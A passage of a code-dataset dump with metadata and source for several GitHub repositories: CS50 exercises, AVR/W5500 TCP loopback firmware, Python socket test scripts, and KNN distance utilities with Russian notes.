"text": "#include <stdio.h>\n#include <ctype.h>\n#include <string.h>\n#include <cs50.h>\n\nint main()\n{\n int l = get_char(\"Input letter: \");\n int k = get_int(\"Input key: \");\n int ac = (int)l;\n int nc = ((ac - 65) + k) % 26;\n printf(\"ciphered relative position %i\\n\", nc);\n printf(\"cipher ASCII code: %d, letter: %c\\n\", 65 + nc, (char)(65+nc));\n\n\n /* for (int i = 65; i <= 117; i++)\n {\n printf(\"%c \", i);\n } \n printf(\"\\n\"); */\n return 0;\n}"
},
{
"alpha_fraction": 0.66144198179245,
"alphanum_fraction": 0.6739811897277832,
"avg_line_length": 34.55555725097656,
"blob_id": "6b609737601a71b52a87f5020165837cc7ea774f",
"content_id": "d8fef04b7c8a9a52baa2f29d15f270cb3a1de360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/pset7/movies/13.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (p.name) FROM people p\nINNER JOIN stars s ON p.id = s.person_id\nINNER JOIN movies m ON s.movie_id = m.id\nWHERE p.name <> 'Kevin Bacon' and m.id in ( \n\tSELECT m.id from movies m\n\tINNER JOIN stars s ON m.id = s.movie_id\n\tINNER JOIN people p ON s.person_id = p.id\n\tWHERE p.name = 'Kevin Bacon' and p.birth = 1958\n)"
},
{
"alpha_fraction": 0.36141908168792725,
"alphanum_fraction": 0.4900221824645996,
"avg_line_length": 22.789474487304688,
"blob_id": "d0d98cb9adc3d7fbc0c4edc4e416af9ff8161619",
"content_id": "a5a5281ebf1ca6a2a0efd2e14add899b31f0948e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 19,
"path": "/pset0/output.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main(void)\n{\n printf(\"Color: %s, Number: %d, float: %5.2f \\n\", \"red\", 42, 3.14159);\n /* Color: red, Number: 42, float: 3.14 */\n\n printf(\"Pi = %3.2f\\n\", 3.14159); \n /* Pi = 3.14 */\n\n printf(\"Pi = %8.5f\\n\", 3.14159); \n /* Pi = 3.14159 */\n\n printf(\"Pi = %-8.5f\\n\", 3.14159); \n /* Pi = 3.14159 */\n\n printf(\"There are %d %s in the tree.\\n\", 22, \"apples\");\n /* There are 22 apples in the tree. */ \n}"
},
{
"alpha_fraction": 0.49833056330680847,
"alphanum_fraction": 0.5191986560821533,
"avg_line_length": 24.76344108581543,
"blob_id": "24be02d544b672004b0d4d4ea4fd1604fc07071c",
"content_id": "310ed009f0f8de95cfd3a16014cdf7d993084353",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2396,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 93,
"path": "/pset1/credit.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include <cs50.h>\n#include <math.h>\n\nvoid get_digits_array(int* digits, long number);\n\nint main(void)\n{\n string result = \"INVALID\";\n bool error = true;\n // ask for credit card number\n long creditcard = 0;\n do\n {\n creditcard = get_long(\"Number: \");\n if(creditcard > 0)\n {\n error = false;\n }\n }\n while(error);\n\n //get the number of digits in the credit card\n int length = (int) (floor(log10(creditcard)) + 1);\n int digits[length];\n //get an array of digits\n get_digits_array(digits, creditcard);\n\n //extract the control digit\n int sum = digits[length-1];\n\n //parity to know which are the digits to multiply\n int parity = length % 2;\n\n //iterate through digits of the card to calculate\n for (int i = 0; i < length - 1; i++)\n {\n int digit = digits[i];\n //multiply every other digit by 2\n if (i % 2 == parity)\n {\n digit = digit * 2;\n }\n if (digit > 9)\n {\n digit = digit - 9;\n }\n sum += digit;\n }\n printf (\"sum: %i, parity: %i\\n\", sum, parity);\n //this is another way to calcultate the control digit.\n /*The check digit (x) is obtained by computing the sum of the other digits (third row) then subtracting the units digit from 10 */\n if (sum % 10 == 0)\n {\n //extract the two first digits to know which is the issuer along wiht length\n int first_digit = digits[0];\n int second_digit = digits[1];\n if(length == 15 && first_digit == 3 && (second_digit == 4 || second_digit == 7))\n {\n result = \"AMEX\";\n }\n else if(length == 16 && first_digit == 5 &&\n (second_digit == 1 || second_digit == 2 || second_digit == 3 || second_digit == 4 || second_digit == 5))\n {\n result = \"MASTERCARD\";\n }\n else if((length == 13 || length == 16) && first_digit == 4)\n {\n result = \"VISA\";\n }\n\n }\n printf(\"%s\\n\", result);\n}\n\nvoid get_digits_array(int *digits, long number)\n{\n long temp,factor = 1;\n temp=number;\n while(temp)\n {\n temp = temp / 10;\n factor = factor * 10;\n }\n int i = 0;\n while(factor > 1)\n {\n factor = factor / 10;\n digits[i] = (int)(number / factor);\n number = number % factor;\n i++;\n }\n}\n"
}
] | 42 |
tprihoda/ECE476_Project
|
https://github.com/tprihoda/ECE476_Project
|
82254fae34aa287b311e9078b25f6fba298d8180
|
bd75d36019fd2f441f3f749eb174bb2aa1240446
|
309f6e65f053b39fdf51f76e5a57b56b679bb61b
|
refs/heads/master
| 2021-01-04T23:46:44.960735 | 2020-02-20T00:27:10 | 2020-02-20T00:27:10 | 240,801,836 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.626724123954773,
"alphanum_fraction": 0.6318965554237366,
"avg_line_length": 15.797101020812988,
"blob_id": "eb48315dc582c9a78a85cda59870d2063b4c3925",
"content_id": "db104d2f6dc00c60ed7b24a764b34e3cdfdef819",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 69,
"path": "/src/fsm.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "/* fsm.h\n *\n * Simple implementation of a finite state machine for launch \n * control\n *\n */\n\n#include <stdint.h>\n\n#define ENTRY_STATE IDLE\n\n/* \n * Defines each state's id\n */\ntypedef enum state_id\n{\n IDLE,\n IGNITION,\n FUELING,\n ERROR,\n\n NUM_STATES \n}state_id;\n\ntypedef enum ret_id\n{\n OK,\n FAIL,\n //TODO: add additional ret id's for dif transitions\n\n NUM_RETS\n}ret_id;\n\n/*\n * State struct with id, function, and status\n */\ntypedef struct state_t\n{\n state_id state;\n int8_t status;\n ret_id (* state_fn)(int8_t* status);\n}state_t;\n\nret_id idle_state(int8_t* status);\nret_id ignition_state(int8_t* status);\nret_id fueling_state(int8_t* status);\nret_id error_state(int8_t* status);\n\nvoid init_sm(state_t* states);\nstate_id sm_engine(state_t* curr_state);\n\nstruct state_transition\n{\n state_id src_state;\n ret_id ret;\n state_id dst_state;\n};\n\n/* \n * Lookup table for state transitions indexed by src_state and then ret\n */\nstruct state_transition transition_lookup[NUM_STATES][NUM_RETS] = \n{\n //IDLE(OK)->IDLE \n { {IDLE, OK, IDLE}, {IDLE, FAIL, IDLE} },\n //IGN\n { {IGNITION, OK, IGNITION} }\n //...\n};\n\n"
},
{
"alpha_fraction": 0.45719990134239197,
"alphanum_fraction": 0.4908909499645233,
"avg_line_length": 22.02298927307129,
"blob_id": "2535350eed0480ed639112cdc0b8c3bf593db1ff",
"content_id": "a6747e362420fd92fe8b5550fa03a9fd74eecbec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4007,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 174,
"path": "/src/tcp_server.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <string.h>\n#include <util/delay.h>\n\n#include \"tcp_server.h\"\n#include \"socket.h\"\n\n#define USART_BAUDRATE 9600\n#define BAUD_PRESCALE ((( F_CPU / ( USART_BAUDRATE * 16UL))) - 1)\n\nvoid initSPI()\n{\n //DDRB |= (1 << PB5) | (1 << PB3) | (1 << PB2); //sck, mosi, ss outputs\n DDRB |= (1 << PB1) | (1 << PB2) | (1 << PB6); //sck, mosi, ss outputs\n SPCR |= (1 << SPE) | (1 << MSTR);\n}\n\nvoid USART_Init( void )\n{\n DDRD |= (1<<PD3);\n\n unsigned int baud = BAUD_PRESCALE;\n\n UBRR1H = (unsigned char) (baud>>8);\n UBRR1L = (unsigned char) baud;\n\n UCSR1B = (1<<RXEN1) | (1<<TXEN1);\n UCSR1C = (1<<USBS1) | (3<<UCSZ10);\n}\n\nuint8_t getByte(void)\n{\n // Check to see if something was received\n while (!(UCSR1A & _BV(RXC1)));\n return (uint8_t) UDR1;\n}\n\nvoid putByte(unsigned char data)\n{\n // Stay here until data buffer is empty\n while (!(UCSR1A & _BV(UDRE1)));\n UDR1 = (unsigned char) data;\n}\n\nvoid writeString(char *str)\n{\n while (*str != '\\0')\n {\n putByte(*str);\n ++str;\n }\n}\n\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port)\n{\n int32_t ret;\n uint16_t size = 0, sentsize = 0;\n\n switch(getSn_SR(sn))\n {\n case SOCK_ESTABLISHED:\n writeString(\"Established\\n\");\n if(getSn_IR(sn) & Sn_IR_CON)\n {\n setSn_IR(sn,Sn_IR_CON);\n }\n if((size = getSn_RX_RSR(sn)) > 0) // Don't need to check SOCKERR_BUSY because it doesn't not occur.\n {\n if(size > DATA_BUF_SIZE) size = DATA_BUF_SIZE; // clips size if larger that data buffer\n ret = recv(sn, buf, size);\n\n if(ret <= 0) return ret; // check SOCKERR_BUSY & SOCKERR_XXX. For showing the occurrence of SOCKERR_BUSY.\n size = (uint16_t) ret;\n sentsize = 0;\n\n while(size != sentsize)\n {\n ret = send(sn, buf+sentsize, size-sentsize);\n if(ret < 0)\n {\n close(sn);\n return ret;\n }\n sentsize += ret; // Don't care SOCKERR_BUSY, because it is zero.\n }\n }\n break;\n case SOCK_CLOSE_WAIT :\n if( (ret = disconnect(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_INIT :\n if( (ret = listen(sn)) != SOCK_OK) return ret;\n writeString(\"Init\\n\");\n break;\n case SOCK_CLOSED:\n if( (ret = socket(sn, Sn_MR_TCP, port, 0x00)) != sn) return ret;\n writeString(\"Closed\\n\");\n default:\n break;\n }\n return 1;\n}\n\nint main()\n{\n USART_Init();\n initSPI();\n\n // Built-in LED\n DDRD |= (1 << PD4);\n\n uint8_t buf[100];\n char buffer[10];\n\n struct wiz_NetInfo_t network_config = \n {\n {MAC},\n {IP},\n {SUBNET},\n {GATEWAY},\n {DNS},\n 2\n };\n\n struct wiz_NetInfo_t temp;\n\n uint8_t txsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n uint8_t rxsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n\n //setup delay\n _delay_ms(2000);\n\n wizchip_init(txsize, rxsize);\n wizchip_setnetinfo(&network_config);\n wizchip_getnetinfo(&temp);\n\n uint8_t version = 0;\n uint16_t rcr = 0;\n uint8_t phycfgr = 0;\n\n PORTD |= (1 << PD4);\n\n while(1)\n {\n version = getVERSIONR(); \n rcr = getRCR(); \n\n phycfgr = getPHYCFGR();\n itoa(phycfgr, buffer, 16);\n writeString(buffer);\n\n _delay_ms(50);\n setPHYCFGR(0xF8);\n\n phycfgr = getPHYCFGR();\n itoa(phycfgr, buffer, 16);\n writeString(buffer);\n\n //itoa(temp.ip[0], buffer, 10);\n //writeString(buffer);\n\n int8_t ret = loopback_tcps(0, buf, 8080);\n\n //itoa(ret, buffer, 10);\n //writeString(buffer);\n\n _delay_ms(1000);\n }\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.644385039806366,
"alphanum_fraction": 0.686274528503418,
"avg_line_length": 26.317073822021484,
"blob_id": "eee5900f99611b46f24e0e3f572905bfaff0bbde",
"content_id": "20844eb20109d23fa10206d4d6ee7cb614c99873",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1122,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 41,
"path": "/Xinyu/client.py",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "import socket\n#import numpy as np\nimport time\nimport random\nimport threading\n#create a socket object\ndef client(port,lamda):\n#\tfor i in range (num_socket):\n client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#hostname = socket.gethostname()\n#host =socket.gethostbyname(hostname)\n host = \"192.168.1.110\"\n#define a port on which to connect\n\n#\t\tport = 8080+i\n#connect to server on local computer\n client.connect((host,port))\n while(1):\n#sample poisson random time\n t = random.expovariate(lamda)\n time.sleep(t)\n#receive data from the server\n data = \"Hello\"\n tosend = data.encode()\n client.sendall(tosend)\n #data = client.recv(1024)\n #s = data.decode()\n #print(s)\n#\t\tcheck = (s=='Thank you for connecting')\n#\t\tprint(check)\n\n\n\nthreading1 = threading.Thread(target = client,args= (8080,4))\nthreading2 = threading.Thread(target = client,args= (8081,3))\nthreading3 = threading.Thread(target = client,args= (8082,2))\nthreading4 = threading.Thread(target = client,args= (8083,1))\nthreading1.start()\nthreading2.start()\nthreading3.start()\nthreading4.start()\n\n\n"
},
{
"alpha_fraction": 0.6884549856185913,
"alphanum_fraction": 0.7207130789756775,
"avg_line_length": 28.450000762939453,
"blob_id": "8b8b342ce7dbd9b47247520811778d8454777959",
"content_id": "5aafff2113e374315c9eb53ec32ef4af96196472",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 40,
"path": "/Xinyu/server.py",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#!usr/bin/env python3\nimport threading\nimport socket\nimport numpy as np\nfrom scipy.stats import poisson\n\n\nhostname = socket.gethostname()# get local machine name\nIPAddr = socket.gethostbyname(hostname)#get local ip address\n#IPAddr = '192.168.0.10'\nport = 8080\n#print(\"Your computer name is: \" + hostname)\n#print(\"Your Computer IP Address is: \" +IPAddr)\n#port = 50000 #reserve a port for the service\nlist_sock = []\nnum_sock = 4\n#generating poisson distributed data\n#data_poisson = poisson.rvs(mu = 3, size = 4000)\n#print(data_poisson[0:10])\nfor i in range(num_sock):\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)#create socket object\n\n\ts.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\ts.bind((IPAddr, port+i))#bind to the port\n\ts.listen(10)#wait for client connection\n\tlist_sock.append(s)\n\tprint( \"[*] Server listening on %s %d\" %(IPAddr,(port+i)))\n\t#establish connection with client\n\tconn, addr = s.accept()\n\tprint ('Got connection from',addr)\n\n\tconn.send('Thank you for connecting'.encode())\n\t#data = data_poisson[0:10]\n\t#conn.send(data)\n#with conn:\n#\tprint('Connected by',addr)\n#\twhile True:\n#\t\tdata = conn.recv(1024)\n#\t\tif not data: break\n#\t\tconn.sendall(data)\n"
},
{
"alpha_fraction": 0.5320196747779846,
"alphanum_fraction": 0.5990147590637207,
"avg_line_length": 21.55555534362793,
"blob_id": "a057163f3092088830a20127a17a57610b6c53f9",
"content_id": "e7378fb3446869894165fec30c2332e7d2b32d65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 45,
"path": "/src/tcp_server.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#ifndef _TCP_SERVER_H_\n#define _TCP_SERVER_H_\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include <stdint.h>\n\n#define MAC 0x44, 0xFF, 0xFF, 0x00, 0x00, 0x00\n#define IP 192, 168, 1, 110 \n#define SUBNET 255, 255, 255, 0 \n#define GATEWAY 192, 168, 1, 1 \n#define DNS 8, 8, 8, 8\n\n#define SOCKET 0\n#define PORT 8080\n\n#pragma message(\"Wizchip ID: \" _WIZCHIP_ID_)\n\n/* Loopback test debug message printout enable */\n#define\t_LOOPBACK_DEBUG_\n\n/* DATA_BUF_SIZE define for Loopback example */\n#ifndef DATA_BUF_SIZE\n #define DATA_BUF_SIZE ( 1024 )\n#endif\n\n/************************/\n/* Select LOOPBACK_MODE */\n/************************/\n#define LOOPBACK_MAIN_NOBLOCK 0\n#define LOOPBACK_MODE LOOPBACK_MAIN_NOBLOCK\n\n// TCP server loopback test example\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port);\n\n// TCP server\nint32_t tcps(uint8_t sn, uint8_t* buf, uint16_t port);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif // _TCP_SERVER_H_\n"
},
{
"alpha_fraction": 0.4777162969112396,
"alphanum_fraction": 0.5333527326583862,
"avg_line_length": 21.728477478027344,
"blob_id": "8d59936ab27f9fa701de38103f284081e1ec74f4",
"content_id": "f60faaf8db41ab57700dd6222c3fb7046b0d0e71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3433,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 151,
"path": "/src/main.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <util/delay.h>\n#include \"socket.h\"\n#include \"tcp_server.h\"\n#include \"uart.h\"\n\n#define MAC 0x44, 0xFF, 0xFF, 0x00, 0x00, 0x00\n#define IP 192, 168, 1, 110 \n#define SUBNET 255, 255, 255, 0 \n#define GATEWAY 192, 168, 1, 1 \n#define DNS 8, 8, 8, 8\n\n#pragma message(\"Wizchip ID: \" _WIZCHIP_ID_)\n\nvoid initSPI()\n{\n DDRB |= (1 << PB5) | (1 << PB3) | (1 << PB2); //sck, mosi, ss outputs\n SPCR |= (1 << SPE) | (1 << MSTR);\n}\n\nvoid initTCNT0()\n{\n TIMSK0 |= (1 << TOIE0); //enable overflow interrupt \n TCCR0B |= (1 << CS02) | (1 << CS00); //1024 prescaling\n}\n\nvoid disableTCNT0()\n{\n TCCR0B = 0;\n}\n\nvoid enableTCNT0()\n{\n TCCR0B |= (1 << CS02) | (1 << CS00); //1024 prescaling\n}\n\nISR(TIMER0_OVF_vect)\n{\n uint8_t s0_ir = getSn_IR(0);\n\n if(!bit_is_clear(s0_ir, 2))\n {\n writeString(\"recv interrupt received!\\r\\n\");\n setSn_IR(0, (s0_ir & (1 << 2))); //clear interrupt\n PORTB ^= (1 << 0);\n }\n}\n\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port)\n{\n int32_t ret;\n uint16_t size = 0, sentsize=0;\n\n switch(getSn_SR(sn))\n {\n case SOCK_ESTABLISHED :\n if(getSn_IR(sn) & Sn_IR_CON)\n {\n\t\t\tsetSn_IR(sn,Sn_IR_CON);\n }\n\t\t if((size = getSn_RX_RSR(sn)) > 0) // Don't need to check SOCKERR_BUSY because it doesn't not occur.\n {\n\t\t\tif(size > DATA_BUF_SIZE) size = DATA_BUF_SIZE;\n\t\t\tret = recv(sn, buf, size);\n\n\t\t\tif(ret <= 0) return ret; // check SOCKERR_BUSY & SOCKERR_XXX. For showing the occurrence of SOCKERR_BUSY.\n\t\t\tsize = (uint16_t) ret;\n\t\t\tsentsize = 0;\n\n\t\t\twhile(size != sentsize)\n\t\t\t{\n writeNumChar(\"First char received: \", *buf, 10);\n\t\t\t\tret = send(sn, buf+sentsize, size-sentsize);\n\t\t\t\tif(ret < 0)\n\t\t\t\t{\n\t\t\t\t\tclose(sn);\n\t\t\t\t\treturn ret;\n\t\t\t\t}\n\t\t\t\tsentsize += ret; // Don't care SOCKERR_BUSY, because it is zero.\n\t\t\t}\n }\n break;\n case SOCK_CLOSE_WAIT :\n if( (ret = disconnect(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_INIT :\n if( (ret = listen(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_CLOSED:\n if( (ret = socket(sn, Sn_MR_TCP, port, 0x00)) != sn) return ret;\n default:\n break;\n }\n return 1;\n}\n\nint main()\n{\n initUART();\n initSPI();\n //initTCNT0();\n DDRB |= (1 << 0);\n\n uint8_t buf[1000];\n\n struct wiz_NetInfo_t network_config = \n {\n {MAC},\n {IP},\n {SUBNET},\n {GATEWAY},\n {DNS},\n 2\n };\n\n struct wiz_NetInfo_t temp;\n\n uint8_t txsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n uint8_t rxsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n\n //setup delay\n _delay_ms(2000);\n\n writeNumChar(\"Init return: \", wizchip_init(txsize, rxsize), 10);\n wizchip_setnetinfo(&network_config);\n wizchip_getnetinfo(&temp);\n\n writeNumChar(\"ip[0]: \", temp.ip[0], 10);\n writeNumChar(\"ip[1]: \", temp.ip[1], 10);\n writeNumChar(\"ip[2]: \", temp.ip[2], 10);\n writeNumChar(\"ip[3]: \", temp.ip[3], 10);\n\n writeNumChar(\"version: \", getVERSIONR(), 16);\n writeNumShort(\"retry count: \", getRTR(), 10);\n\n sei(); //enable global interrupts\n\n while(1)\n {\n //disableTCNT0();\n loopback_tcps(0, buf, 8080);\n writeNumChar(\"Socket 0 SR: \", getSn_SR(0), 16);\n //enableTCNT0();\n _delay_ms(500);\n }\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6291600465774536,
"alphanum_fraction": 0.6339144110679626,
"avg_line_length": 18.41538429260254,
"blob_id": "cd2258c3f3518e35e83789fda0583b979137d98b",
"content_id": "773b0e0a2cd7edcee40dbd77f4010294e576e2fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 65,
"path": "/src/fsm.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#include \"fsm.h\"\n\nret_id idle_state(int8_t* status)\n{\n return OK;\n}\n\nret_id ignition_state(int8_t* status)\n{\n return OK;\n}\n\nret_id fueling_state(int8_t* status)\n{\n return OK;\n}\n\nret_id error_state(int8_t* status)\n{\n return OK;\n}\n\n/*\n * Initialize an array of states (up to NUM_STATES) with their \n * respective state id, status (0 at start), and state function\n * passed address of the specific state's status (do this with switch)\n */\nvoid init_sm(state_t* states)\n{\n}\n\n/*\n * Check the prev state's status, if it was non-zero\n *\n */\nstate_id sm_engine(state_t* curr_state)\n{\n //run the current state\n //if its ret id is not FAIL, then\n //use lookup table to determine and return next state\n //else\n //update error state with error status of prev failed state\n //go-to error state and handle error, reset status\n \n return OK;\n}\n\nint main()\n{\n //declare an array of states\n state_t states[NUM_STATES];\n\n //init the states\n //prime state machine engine with entry state\n //e.g. state_t curr_state = states[ENTRY_STATE];\n\n for(;;)\n {\n //run the engine and update state\n //e.g. state_id next_state = sm_engine(&curr_state);\n //curr_state = states[next_state];\n }\n \n return 0;\n}\n"
},
{
"alpha_fraction": 0.6218487620353699,
"alphanum_fraction": 0.6554622054100037,
"avg_line_length": 25.33333396911621,
"blob_id": "6e3ba530484def6f539a89e1450290cf307ab9d0",
"content_id": "70ba40d1be19b485b7b732aa894fd6d37c0888f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 9,
"path": "/lib/ioLibrary_Driver/Ethernet/wizchip_select.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#ifndef _WIZCHIP_SELECT_H_\n#define _WIZCHIP_SELECT_H_\n\n//Select W5500\n#define _WIZCHIP_ W5500\n//Set I/O mode to use SPI rather than BUS\n#define _WIZCHIP_IO_MODE_ _WIZCHIP_IO_MODE_SPI_VDM_\n\n#endif //_WIZCHIP_SELECT_H_\n\n"
}
] | 8 |
Resolvation/ml-homeworks
|
https://github.com/Resolvation/ml-homeworks
|
27517827bf878cc204e164cb9362c2179d73ed5c
|
b66355327ac0e196bb56644ff6bfcf801184a625
|
70f0619bb1ff85ac74e578a1c83e943c92efeedd
|
refs/heads/master
| 2019-03-20T01:28:01.513621 | 2018-10-22T21:26:08 | 2018-10-22T21:26:08 | 123,813,032 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5423387289047241,
"alphanum_fraction": 0.6169354915618896,
"avg_line_length": 32.06666564941406,
"blob_id": "4a57df5acf26accd4fdfec6c97e4311ff9acc880",
"content_id": "bf9f60bb68105e285a1f2c075e76976eab5816d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/tmp.py",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport nearest_neighbors as nn\n\nknn = nn.KNNClassifier(k=3, strategy='my_own')\nknn2 = nn.KNNClassifier(k=3)\nx = np.array([[1], [2], [3], [4], [5]])\ny = np.array([43, 12, 12, 12, 12])\nknn.fit(x, y)\nknn2.fit(x, y)\nprint('fitted succesfully')\nprint(knn.find_kneighbors(np.array([[1], [4.5], [5]])))\nprint(knn2.find_kneighbors(np.array([[1], [4.5], [5]])))\nprint('found succesfully')\nprint(knn.predict(np.array([[1], [4.5], [5]])))\nprint(knn2.predict(np.array([[1], [4.5], [5]])))\n"
},
{
"alpha_fraction": 0.8450704216957092,
"alphanum_fraction": 0.8450704216957092,
"avg_line_length": 70,
"blob_id": "1d68219590ae252ecb95f388101e8a457cc1bc0c",
"content_id": "9bdd01391233608cfdaf77b7c0eddb5761a71b58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "# Репозитория для хранения практических заданий по машинному обучению.\n"
},
{
"alpha_fraction": 0.8054607510566711,
"alphanum_fraction": 0.8054607510566711,
"avg_line_length": 116.19999694824219,
"blob_id": "e9e057a90f97643561b959e86eef57c3757ef153",
"content_id": "3c75ec6bc4ca78ab43134ae0f3f84aa5e68c4918",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2096,
"license_type": "no_license",
"max_line_length": 339,
"num_lines": 10,
"path": "/KNN/README.md",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "## Выводы:\n**По алгоритмам**: brute - универcальный, работает с любыми метриками, не сильно проседает от количесва признаков, kd_tree, ball_tree - чуть быстрей при маленьком количесве признаков, но сильно проседают при большом, вероятней всего изза пред просчета.\n\n**По метрикам**: косинусная определенно лучше, хоть чуть проседает по скорости. Думаю это изза того, что она должна лучше работать на обьектах в большим количеством нулевых признаков(евклидова практически не будет из отличать).\n\n**По весам**: в обоих задачах выгодней было использовать веса. Особенно большую пользу принесло на обработке текста. Видимо это позволяет не так сильно выделять длинные предложения.\n\n**По ошибкам**: в первом задании ошибки, в основном на смазанных обьектах, во втором - на очень коротких предложениях или без использования терминологии.\n\n**По оптимизации**: в первом случае можно выбирать не всю матрицу, а только ее участки, это позволит избежать части ошибок на смазанных объектах. Во втором стоит выбросить предлоги или снизить их вес и наоборот повысить вес терминов. Можно попробовать выделить эталоны и увеличить их вес. При работе с весами можно поэкспериметировать с е.\n"
},
{
"alpha_fraction": 0.6243016719818115,
"alphanum_fraction": 0.6354748606681824,
"avg_line_length": 33.095237731933594,
"blob_id": "a988ad0446738b40ee8ee23ce5778a8f8369f78e",
"content_id": "03b6572e553ddd9c0ec1335a4dd0b1258098ec7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 716,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 21,
"path": "/distances.py",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom numpy.linalg import norm\n\n\ndef squared_l2_norm(x):\n '''Square of vector L2 norm.'''\n return np.sum(np.multiply(x, x))\n\n\ndef euclidean_distance(X, Y):\n '''Matrix of euclidean distances between elements of matrix X and Y.'''\n s_X_norms = np.array([squared_l2_norm(x) for x in X])\n s_Y_norms = np.array([squared_l2_norm(y) for y in Y])\n X_by_Y = np.matmul(X, np.transpose(Y))\n return np.sqrt(s_Y_norms[np.newaxis, :] + s_X_norms[:, np.newaxis] - 2*X_by_Y)\n\n\ndef cosine_distance(X, Y):\n '''Matrix of cosine distances between elements of matrix X and Y.'''\n X_by_Y = np.matmul(X, np.transpose(Y))\n return 1 - X_by_Y / norm(X, axis=1)[:, np.newaxis] / norm(Y, axis=1)\n"
}
] | 4 |
saloni-080601/webscraping
|
https://github.com/saloni-080601/webscraping
|
f80399296f46ab5a707dd680581568bbfbe686bd
|
c6d02c11f354f681d6f5582aabe413db3445a150
|
8723a1acdcd3c88edc6b86e63a3428b6d1759ad4
|
refs/heads/main
| 2023-07-15T12:26:34.240422 | 2021-08-30T08:06:09 | 2021-08-30T08:06:09 | 401,244,023 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6247059106826782,
"alphanum_fraction": 0.6411764621734619,
"avg_line_length": 27.366666793823242,
"blob_id": "ad0ac22c82d82f52c88e3e52ff6a2ae516c1599c",
"content_id": "5d3ad164b8e24bf8fbdeb37f18287c19511e7ac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 30,
"path": "/e_commerce.py",
"repo_name": "saloni-080601/webscraping",
